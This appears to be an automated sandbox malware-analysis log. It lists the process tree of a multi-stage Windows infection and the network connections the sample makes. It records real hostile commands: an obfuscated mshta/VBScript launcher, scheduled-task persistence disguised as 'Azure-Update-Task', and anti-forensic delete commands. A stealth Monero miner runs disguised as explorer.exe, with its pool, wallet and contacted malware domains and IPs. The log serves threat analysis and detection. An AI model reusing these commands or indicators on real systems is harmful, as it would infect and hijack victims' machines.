"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\1318651.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\1318651.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Users\Admin\AppData\Local\Temp\is-JV285.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JV285.tmp\setup_2.tmp" /SL5="$1024C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\5930282.exe

"C:\ProgramData\5930282.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 712

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 712

C:\Program Files\7-Zip\WJIDREWJFA\ultramediaburner.exe

"C:\Program Files\7-Zip\WJIDREWJFA\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\de-36b7b-4d2-084b0-d2dd3d2ab45e5\Kagymaelaehae.exe

"C:\Users\Admin\AppData\Local\Temp\de-36b7b-4d2-084b0-d2dd3d2ab45e5\Kagymaelaehae.exe"

C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp" /SL5="$10338,281924,62464,C:\Program Files\7-Zip\WJIDREWJFA\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\05-331a7-577-75fbd-48979e7bb6800\Kusaqujyky.exe

"C:\Users\Admin\AppData\Local\Temp\05-331a7-577-75fbd-48979e7bb6800\Kusaqujyky.exe"

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\1318651.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\1318651.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\1596296.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\1596296.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "1318651.exe" /F

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "1596296.exe" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\is-1KSJS.tmp\postback.exe

"C:\Users\Admin\AppData\Local\Temp\is-1KSJS.tmp\postback.exe" ss1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat19e4750dd01.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e4750dd01.exe" & exit

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat19e4750dd01.exe" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\SysWOW64\explorer.exe

explorer.exe ss1

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3212 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\z9Jllew4h.exe

"C:\Users\Admin\AppData\Local\Temp\z9Jllew4h.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1696

C:\Users\Admin\AppData\Local\Temp\ViqTvaztw.exe

"C:\Users\Admin\AppData\Local\Temp\ViqTvaztw.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2716 -s 1716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 1704

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im z9Jllew4h.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\z9Jllew4h.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "887698306-511507872-698541044-18198598472466702562895780-1964030337-1430064671"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im z9Jllew4h.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tbq3yagx.plh\GcleanerEU.exe /eufive & exit

C:\Users\Admin\AppData\Local\Temp\tbq3yagx.plh\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\tbq3yagx.plh\GcleanerEU.exe /eufive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe /qn CAMPAIGN="654" & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3t4qjarg.bub\anyname.exe & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe

C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe /qn CAMPAIGN="654"

C:\Users\Admin\AppData\Local\Temp\3t4qjarg.bub\anyname.exe

C:\Users\Admin\AppData\Local\Temp\3t4qjarg.bub\anyname.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0hufpbrq.aup\gcleaner.exe /mixfive & exit

C:\Users\Admin\AppData\Local\Temp\0hufpbrq.aup\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\0hufpbrq.aup\gcleaner.exe /mixfive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ijsi2jlf.l1l\autosubplayer.exe /S & exit

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tbq3yagx.plh\GcleanerEU.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "GcleanerEU.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0hufpbrq.aup\gcleaner.exe" & exit

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7DE9034E43A381B64746B1A563C42EBB C

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "gcleaner.exe" /f

C:\Users\Admin\AppData\Local\Temp\EAFB.exe

C:\Users\Admin\AppData\Local\Temp\EAFB.exe

C:\Users\Admin\AppData\Local\Temp\148B.exe

C:\Users\Admin\AppData\Local\Temp\148B.exe

C:\Users\Admin\AppData\Local\Temp\3F15.exe

C:\Users\Admin\AppData\Local\Temp\3F15.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133438 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Users\Admin\AppData\Local\Temp\3F15.exe

C:\Users\Admin\AppData\Local\Temp\3F15.exe

C:\Users\Admin\AppData\Local\Temp\75CF.exe

C:\Users\Admin\AppData\Local\Temp\75CF.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\56d53bef-448b-4e4b-bcff-61fbea280644" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding F838E9D029F302BDC1C9D06BB70C0EC2

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Users\Admin\AppData\Local\Temp\3F15.exe

"C:\Users\Admin\AppData\Local\Temp\3F15.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\3F15.exe

"C:\Users\Admin\AppData\Local\Temp\3F15.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe

"C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe"

C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe

"C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe"

C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe

"C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe"

C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe

"C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1944575904-848628363-1381637910-1448476182117153012314186897021331040543-236071782"

C:\Windows\system32\taskeng.exe

taskeng.exe {EEDD46A5-0E0A-490E-8E13-260481ED99C0} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\6675.exe

C:\Users\Admin\AppData\Local\Temp\6675.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1975761326-7157919851458050877-251704113857089686-1950550425306082894-557173746"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 15005671F5A424B2DCD07CDBDCDC4950 M Global\MSI0000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im build2.exe /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3212 CREDAT:406553 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\96C8.exe

C:\Users\Admin\AppData\Local\Temp\96C8.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im 96C8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\96C8.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im 96C8.exe /f

C:\Users\Admin\AppData\Local\Temp\2082.exe

C:\Users\Admin\AppData\Local\Temp\2082.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {E3CF9F55-6C86-4551-B855-86EDB245A5FD} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1242321394-4298895309666633831270987455121810049557504965-268533058-1323187467"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1199328295474572820936434757-21069946371822882091-12637757982117547822-1688051549"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "848523965242649427-1574634450-432477704-12134953441399061000-2615420261021331199"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3212 CREDAT:1389584 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\75CF.exe"

C:\Users\Admin\AppData\Local\Temp\IhW9xVZUG3.exe

"C:\Users\Admin\AppData\Local\Temp\IhW9xVZUG3.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe

C:\Users\Admin\AppData\Roaming\fiarrag

C:\Users\Admin\AppData\Roaming\fiarrag

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3212 CREDAT:1258525 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215

C:\Users\Admin\AppData\Local\56d53bef-448b-4e4b-bcff-61fbea280644\3F15.exe

C:\Users\Admin\AppData\Local\56d53bef-448b-4e4b-bcff-61fbea280644\3F15.exe --Task

C:\Users\Admin\AppData\Roaming\fiarrag

C:\Users\Admin\AppData\Roaming\fiarrag

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3212 CREDAT:537638 /prefetch:2

C:\Users\Admin\AppData\Local\56d53bef-448b-4e4b-bcff-61fbea280644\3F15.exe

C:\Users\Admin\AppData\Local\56d53bef-448b-4e4b-bcff-61fbea280644\3F15.exe --Task

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3212 CREDAT:537694 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 104.21.87.76:80 hsiens.xyz tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 safialinks.com udp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 162.0.213.132:80 safialinks.com tcp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
US 104.21.37.182:443 startupmart.bar tcp
N/A 127.0.0.1:49231 tcp
N/A 127.0.0.1:49233 tcp
US 8.8.8.8:53 wheelllc.bar udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 104.21.64.202:443 wheelllc.bar tcp
US 8.8.8.8:53 connectini.net udp
US 8.8.8.8:53 qwertys.info udp
US 162.0.210.44:443 connectini.net tcp
US 104.21.20.198:443 qwertys.info tcp
US 8.8.8.8:53 yelty.info udp
US 104.21.17.186:443 yelty.info tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 8.8.8.8:53 phonefix.bar udp
US 8.8.8.8:53 www.mhmvc.xyz udp
RU 188.225.87.175:80 www.mhmvc.xyz tcp
US 104.21.37.182:443 startupmart.bar tcp
US 104.21.10.67:443 phonefix.bar tcp
US 8.8.8.8:53 live.goatgame.live udp
US 208.95.112.1:80 ip-api.com tcp
US 172.67.222.125:443 live.goatgame.live tcp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 liveme31.com udp
US 104.21.13.27:80 liveme31.com tcp
SC 185.215.113.104:18754 tcp
SC 185.215.113.104:18754 tcp
US 8.8.8.8:53 phonefix.bar udp
US 172.67.131.66:443 phonefix.bar tcp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 api.ip.sb udp
RU 45.9.20.20:13441 tcp
US 8.8.8.8:53 downloadlog.com udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 104.26.13.31:443 api.ip.sb tcp
NL 142.250.179.132:80 www.google.com tcp
RU 188.119.65.241:80 downloadlog.com tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 nopedope1.com udp
US 172.67.134.210:80 nopedope1.com tcp
US 8.8.8.8:53 maf-pub.com udp
US 172.67.180.210:80 maf-pub.com tcp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
US 8.8.8.8:53 sanctam.net udp
SE 185.65.135.234:58899 sanctam.net tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 primods.com udp
RU 188.119.65.241:80 primods.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
RU 188.119.65.241:80 primods.com tcp
US 172.67.131.66:443 phonefix.bar tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 104.23.98.190:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 185.71.66.31:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 annual-gamers-choice.com udp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 8.8.8.8:53 wheelllc.bar udp
US 172.67.136.53:443 wheelllc.bar tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 8.8.8.8:53 google.com udp
DE 162.55.179.90:80 162.55.179.90 tcp
US 162.0.210.44:443 connectini.net tcp
US 162.0.220.187:80 requestimmersive.com tcp
UA 194.145.227.159:80 194.145.227.159 tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 104.21.33.188:443 source3.boys4dayz.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 aa.goatgamea.com udp
US 104.21.62.66:443 aa.goatgamea.com tcp
US 8.8.8.8:53 bb.goatgamed.com udp
US 104.21.30.211:443 bb.goatgamed.com tcp
DE 88.99.66.31:443 iplogger.org tcp
NL 51.15.69.136:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 172.67.146.70:443 a.goatgame.co tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 varmisende.com udp
PK 116.58.10.58:80 varmisende.com tcp
US 8.8.8.8:53 fernandomayol.com udp
KR 211.59.14.90:80 fernandomayol.com tcp
KR 211.59.14.90:80 fernandomayol.com tcp
US 8.8.8.8:53 fernandomayol.com udp
BG 151.251.30.69:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
SC 185.215.113.29:8678 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
NL 146.70.35.170:30905 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 securebiz.org udp
BR 138.36.3.134:80 securebiz.org tcp
US 104.26.13.31:443 api.ip.sb tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 api.2ip.ua udp
UA 77.123.139.190:443 api.2ip.ua tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 telete.in udp
DE 195.201.225.248:443 telete.in tcp
BG 151.251.30.69:80 fernandomayol.com tcp
MD 5.181.156.77:80 5.181.156.77 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
